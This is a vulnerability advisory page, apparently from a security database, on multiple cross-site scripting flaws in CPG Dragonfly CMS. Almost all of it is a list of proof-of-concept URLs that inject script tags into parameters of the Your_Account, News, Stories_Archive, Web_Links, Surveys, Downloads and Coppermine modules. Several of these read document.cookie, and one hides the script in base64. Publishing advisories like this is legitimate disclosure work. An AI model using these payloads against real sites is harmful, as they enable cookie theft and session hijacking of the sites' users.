• info
• discussion
• exploit
• solution
• references

CPG Dragonfly CMS Multiple Cross-Site Scripting Vulnerabilities

Attackers can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/index.php?name=Your_Account&error=1&uname=bGFsYWxh"><script>alert(document.cookie)</script>
http://www.example.com/index.php?name=Your_Account&error=1"><script>alert(document.cookie)</script>&uname=bGFsYWxh
http://www.example.com/index.php?name=Your_Account&profile=3"><script>alert(document.cookie)</script>
http://www.example.com/index.php?name=Your_Account&error=1&uname=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
http://www.example.com/index.php?name=News&catid=1"><script>alert()</script>
http://www.example.com/index.php?name=News&file=article&sid=7"><script>alert()</script>
http://www.example.com/index.php?name=News&file=submit
http://www.example.com/index.php?name=News&file=friend&sid=5"><script>alert()</script>
http://www.example.com/index.php?name=Stories_Archive&sa=show_month&year=2005&month=11"><script>alert()</script>
http://www.example.com/index.php?name=Stories_Archive&sa=show_month&year=2005"><script>alert()</script>> &month=11
http://www.example.com/index.php?name=Stories_Archive&sa=show_all"><script>alert()</script>
http://www.example.com/index.php?name=Web_Links&l_op=viewlink&cid=15&min=10&orderby=title%20ASC&show=0"><script>alert(document.cookie)</script>
http://www.example.com/index.php?name=Web_Links&l_op=viewlink&cid=15"><script>alert()</script>
http://www.example.com/index.php?name=Web_Links&l_op=toprated&ratenum=5&ratetype=percent"><script>alert()</script>
http://www.example.com/index.php?name=Web_Links&l_op=viewlink&cid=15&orderby=titled"><script>alert()</script>
http://www.example.com/index.php?name=Surveys&op=results"><script>alert()</script>pollid=3
http://www.example.com/index.php?name=Surveys&op=results&pollid=5"><script>alert()</script>
http://www.example.com/index.php?name=Downloads&c=1"><script>alert()</script>
http://www.example.com/coppermine/thumbnails/meta="><script>alert()</script>topn/album=1.html
http://www.example.com/coppermine/thumbnails/metatopn/album=1.html"><script>alert()</script>
http://www.example.com/index.php?name=coppermine&file=thumbnails&album=1"><script>alert()</script>
http://www.example.com/index.php?name=Search